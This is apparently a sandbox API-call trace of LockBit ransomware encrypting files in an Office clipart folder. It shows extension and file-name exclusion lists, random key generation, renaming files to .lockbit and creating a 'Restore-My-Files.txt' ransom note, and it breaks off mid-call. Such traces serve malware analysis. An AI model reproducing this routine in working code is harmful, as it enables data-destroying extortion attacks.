[0152.281] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0152.281] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0152.281] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0152.282] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0152.282] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0152.282] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0152.282] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0152.282] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0152.282] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0152.282] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0152.282] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0152.282] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.282] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0152.282] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0152.282] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0152.282] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0152.282] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0152.282] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0152.282] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0152.282] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0152.282] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0152.282] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0152.282] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0152.282] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0152.283] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0152.283] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0152.283] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0152.283] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0152.283] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0152.283] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.283] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0152.283] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0152.283] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0152.283] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0152.283] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0215709.WMF") returned 1 [0152.283] lstrcmpiW (lpString1="ntldr", lpString2="J0215709.WMF") returned 1 [0152.283] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0215709.WMF") returned 1 [0152.283] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0215709.WMF") returned -1 [0152.283] lstrcmpiW (lpString1="autorun.inf", lpString2="J0215709.WMF") returned -1 [0152.283] lstrcmpiW (lpString1="thumbs.db", lpString2="J0215709.WMF") returned 1 [0152.283] lstrcmpiW (lpString1="iconcache.db", lpString2="J0215709.WMF") returned -1 [0152.283] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0152.283] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0215709.WMF") returned=".WMF" [0152.284] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0152.284] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0152.284] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0152.284] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0152.284] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0152.284] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0152.284] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0152.284] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0152.284] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0152.284] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0152.284] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0152.284] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0152.284] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0152.284] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0152.284] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0152.284] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0152.284] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0152.284] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0152.284] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0152.284] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0152.285] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0152.285] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0152.285] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0152.285] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0152.285] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0152.285] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0152.285] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0152.285] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0152.285] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0215709.WMF.lockbit") returned 72 [0152.285] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0215709.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0215709.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0152.286] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0152.286] malloc (_Size=0x40068) returned 0x3e70008 [0152.286] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=9290) returned 1 [0152.286] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.287] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.287] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0152.287] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.288] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.288] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0152.288] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0152.611] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0215709.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0215709.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0152.611] malloc (_Size=0xa6) returned 0x1fa2ed8 [0152.611] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0152.612] free (_Block=0x1fa2ed8) [0152.612] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0215709.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0152.612] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0152.612] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0152.613] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87920b00, ftCreationTime.dwHighDateTime=0x1be4927, ftLastAccessTime.dwLowDateTime=0x565a9290, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x87920b00, ftLastWriteTime.dwHighDateTime=0x1be4927, nFileSizeHigh=0x0, nFileSizeLow=0x45a2, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0215710.WMF", cAlternateFileName="")) returned 1 [0152.613] lstrcmpiW (lpString1=".", lpString2="J0215710.WMF") returned -1 [0152.613] lstrcmpiW (lpString1="..", lpString2="J0215710.WMF") returned -1 [0152.613] PathFindExtensionW (pszPath="J0215710.WMF") returned=".WMF" [0152.613] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0152.613] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0152.613] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0152.613] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0152.613] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0152.613] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0152.613] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0152.613] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0152.613] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0152.613] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0152.613] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0152.613] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0152.613] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0152.613] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0152.613] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0152.613] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0152.614] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0152.614] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0152.614] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0152.614] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0152.614] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0152.614] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0152.614] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0152.614] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0152.614] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.614] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0152.614] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0152.614] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0152.614] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0152.614] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0152.614] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0152.614] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0152.614] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0152.614] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0152.614] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0152.614] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0152.614] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0152.614] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0152.614] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0152.615] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0152.615] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0152.615] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0152.615] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.615] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0152.615] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0152.615] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0152.615] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0152.615] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0215710.WMF") returned 1 [0152.615] lstrcmpiW (lpString1="ntldr", lpString2="J0215710.WMF") returned 1 [0152.615] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0215710.WMF") returned 1 [0152.615] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0215710.WMF") returned -1 [0152.615] lstrcmpiW (lpString1="autorun.inf", lpString2="J0215710.WMF") returned -1 [0152.615] lstrcmpiW (lpString1="thumbs.db", lpString2="J0215710.WMF") returned 1 [0152.615] lstrcmpiW (lpString1="iconcache.db", lpString2="J0215710.WMF") returned -1 [0152.615] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0152.615] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0215710.WMF") returned=".WMF" [0152.615] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0152.615] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0152.615] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0152.615] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0152.615] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0152.616] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0152.616] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0152.616] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0152.616] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0152.616] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0152.616] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0152.616] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0152.616] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0152.616] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0152.616] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0152.616] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0152.616] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0152.616] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0152.616] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0152.616] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0152.616] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0152.616] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0152.616] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0152.616] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0152.616] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0152.616] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0152.616] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0152.616] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0152.616] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0215710.WMF.lockbit") returned 72 [0152.617] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0215710.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0215710.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0152.618] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0152.618] malloc (_Size=0x40068) returned 0x3df0008 [0152.618] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=17826) returned 1 [0152.618] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.619] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.619] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0152.619] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.619] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.619] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0152.619] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0152.621] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0215710.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0215710.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0152.621] malloc (_Size=0xa6) returned 0x1fa2ed8 [0152.621] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0152.623] free (_Block=0x1fa2ed8) [0152.623] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0215710.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0152.623] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0152.623] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0152.623] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95e02700, ftCreationTime.dwHighDateTime=0x1be4927, ftLastAccessTime.dwLowDateTime=0x565a9290, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x95e02700, ftLastWriteTime.dwHighDateTime=0x1be4927, nFileSizeHigh=0x0, nFileSizeLow=0x15f2, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0215718.WMF", cAlternateFileName="")) returned 1 [0152.623] lstrcmpiW (lpString1=".", lpString2="J0215718.WMF") returned -1 [0152.623] lstrcmpiW (lpString1="..", lpString2="J0215718.WMF") returned -1 [0152.623] PathFindExtensionW (pszPath="J0215718.WMF") returned=".WMF" [0152.623] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0152.623] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0152.623] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0152.623] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0152.623] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0152.623] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0152.623] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0152.623] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0152.625] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0152.625] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0152.625] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0152.625] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0152.625] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0152.625] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0152.625] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0152.625] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0152.625] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0152.625] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0152.625] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0152.625] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0152.625] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0152.625] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0152.625] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0152.625] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0152.625] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.625] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0152.625] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0152.626] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0152.626] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0152.626] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0152.626] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0152.626] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0152.626] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0152.626] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0152.626] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0152.626] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0152.626] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0152.626] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0152.626] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0152.626] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0152.626] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0152.626] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0152.626] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.626] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0152.626] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0152.626] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0152.626] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0152.626] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0215718.WMF") returned 1 [0152.627] lstrcmpiW (lpString1="ntldr", lpString2="J0215718.WMF") returned 1 [0152.627] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0215718.WMF") returned 1 [0152.627] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0215718.WMF") returned -1 [0152.627] lstrcmpiW (lpString1="autorun.inf", lpString2="J0215718.WMF") returned -1 [0152.627] lstrcmpiW (lpString1="thumbs.db", lpString2="J0215718.WMF") returned 1 [0152.627] lstrcmpiW (lpString1="iconcache.db", lpString2="J0215718.WMF") returned -1 [0152.627] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0152.627] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0215718.WMF") returned=".WMF" [0152.627] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0152.627] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0152.627] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0152.627] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0152.627] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0152.627] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0152.627] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0152.627] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0152.627] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0152.627] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0152.627] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0152.627] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0152.628] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0152.628] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0152.628] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0152.628] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0152.628] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0152.628] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0152.628] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0152.628] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0152.628] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0152.628] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0152.628] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0152.628] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0152.628] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0152.628] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0152.628] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0152.628] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0152.628] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0215718.WMF.lockbit") returned 72 [0152.628] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0215718.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0215718.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0152.629] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0152.630] malloc (_Size=0x40068) returned 0x1ff1e60 [0152.630] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=5618) returned 1 [0152.630] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.630] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.630] BCryptGenRandom (in: hAlgorithm=0x0, 